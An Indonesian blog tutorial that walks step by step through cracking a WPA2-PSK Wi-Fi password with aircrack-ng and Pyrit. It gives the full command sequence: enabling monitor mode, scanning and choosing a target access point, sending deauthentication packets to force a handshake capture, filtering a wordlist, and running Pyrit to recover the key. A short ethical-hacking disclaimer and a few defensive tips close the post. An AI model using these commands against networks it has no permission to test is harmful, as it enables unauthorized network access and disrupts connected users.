Assalamualaikum Wr Wb
Admin Mau Posting Lagi Tentang WiFi KungFu Lagi Nih :D
Pada Post Sebelum Nya Saya Memakai Tools Aircrack-ng Hashcat,Nah Pada Kali Ini Sekarang Saya Menggunakan Tools Yang Bernama Pyrit.
Apa Itu Pyrit?
Yang Saya Tau Tools Ini Untuk Cracking Wirless Access Point Dengan Enskripsi WPA2 Otentikasi PSK(Pre Shared Key) yang metode cracking nya menggunakan rainbow tables.admin sendiri kurang tau ttg rainbow tables :D
Yang Pasti Metode Serangan Nya Metode BruteForce Attack Dan Dictionary Attack.
Urutan Proses:
A.Menscan Wireless Acces Point Sekitar Dan Menentukan Target.
B.Menangkap Informasi Client Legal Ke AP tsb,Salah Satu Nya Menangkap Enskripsi Password.
C.Membuat Dan Mengkonfigurasi Database/Rainbow Table Pyrit.
D.Breaking The Password
Tool Dan Bahan:
1.aircrack-ng suite
2.Wordlist
3.Pyrit
Langkah Langkah:
A.Menscan Dan Menentukan Target
Tahap Kali Ini Kita akan menscan wifi sekitar dan menentukan target.1.Aktifkan Mode Monitor Dengan Mengetik di terminal:
airmon-ng check kill
airmon-ng start wlan0
di sini interface yang di buat adalah wlan0mon,jika mon0 silahkan di kondisikan
2.scan AP Sekitar,Ketik di terminal:
airodump-ng wlan0mon
saya akan memilih HardGhost Security
3.Scan Target Dengan Spesifikasi bssid dan channel,dengan mengetik di terminal:
airodump-ng -c <channel> --bssid <bssid> -w wpacrack <wlan0mon/mon0>
Jangan Tutup Terminal yang ini,Buka terminal baru untuk mencari handshake.
B.Menangkap Informasi Client Ke Acces Point (Handshake).
Pada Tahap Ini Kita akan menangkap informasi AP Nya dengan cara memutus client yang tersambung,setelah terputus client akan Reconnect ke AP
Dan pada saat itulah kita menangkap Informasi AP Tsb/Enskripsi.
4.Lalu Kita Akan mengirim Paket DeAuth Untuk memutus client (lihat di bagian station itu adalah mac address client) dengan mengetik:
aireplay-ng --deauth 1 -a <bssid> -c <station/mac adress> <wlan0mon/mon0>
Tips Untuk Cepat Mendapatkan Handshake:
1.Sobat Harus Dekat Dengan AP
2.Jeda Sejenak Setelah Mengirim Paket Deauth,karna client sedang Reconnect ke AP
3.Pilih Client Dengan Nilai Frame Terbesar.
Jika Sudah Mendapatkan Handshake Ada Tulisan WPA HANDSHAKE bla bla di terminal yang sedang menjalankan airodump-ng.
contoh handshake:
C.Membuat Database Pyrit Dan Menkonfigurasi Database.
Pada Kali Ini Kita akan membuat database dari pyrit tsb.
5.Sebelum nya Kita Menyaring Wordlist Yang Karakter Nya Hanya 8 Karakter,Ketik di terminal
cat <letak wordlist> | sort | uniq | pw-inspector -m 8 -M 63 > wordlist.txt
mv wordlist.txt wpa.lst
proses nya sekitar 2 menit/5 menit tergantung wordlist,dan wordlist nya ada 96 juta password.
6.Selanutnya kita membuat database pyrit dengan mengetik:
pyrit -e wpacrack create_essid
7.Sekarang Kita Membuat HASH dari wpa.lst Untuk pyrit ketik di terminal:
pyrit batch
8.Sekarang Kita Memasukan/Mengimport Wordlist Ke Database Ketik Di Terminal:
pyrit -i wpa.lst import_password
dan suhu processor pun naik saya sarankan untuk tidak sampai selesai Karna Selain Lama,Suhu Laptop Akan Naik.
Saya SarankanTunggu sampai 5 menit Kemudian tekan ctrl + c. jika ingin berhasil,tunggu saja proses menggenerate nya sampai selesai.
D.Breaking The Password
9.Oke Sekarang Tahap Terakhir Yaitu Proses Cracking nya,oke langsung saja Ketik Di Terminal:
pyrit -r wpacrack-01.cap -i wpa.lst attack_passthrough
Proses Cracking nya pun sedang berjalan......
Proses nya tergantung dari wordlist semakin banyak wordlist yang tidak cocok,semakin lama prosesnya.
dann taraaa ternyata password nya hardghostsecurity :D
1.Gunakan Enskripsi WPA2/PSK Jangan WPS,WEP,OPN.
2.Gunakan Password yang sulit di tebak.
3.Gunakan Mac Filtering.
Gimana Lumayan Susah Kan Sobat? :D
Yah Memang Hacking itu gak ada yang instan ya sobat,jika hanya klik ini klik itu anak kecil pun bisa Tapi Tidak tahu cara kerja nya.
Kita Harus Tau Proses Nya Dan Bagaimana Cara Kerja nya.
Jika Ingin Copas,Silahkan Saja Asalkan Tau Diri :)
Sekain Dari Saya Semoga Bermanfaat,Jangan Gunakan Ilmu Hacking Mu Untuk Kejahatan,Jadilah Ethical Hacker ;)
Wassalamualaikum Wr Wb
Author: Hardian Alkori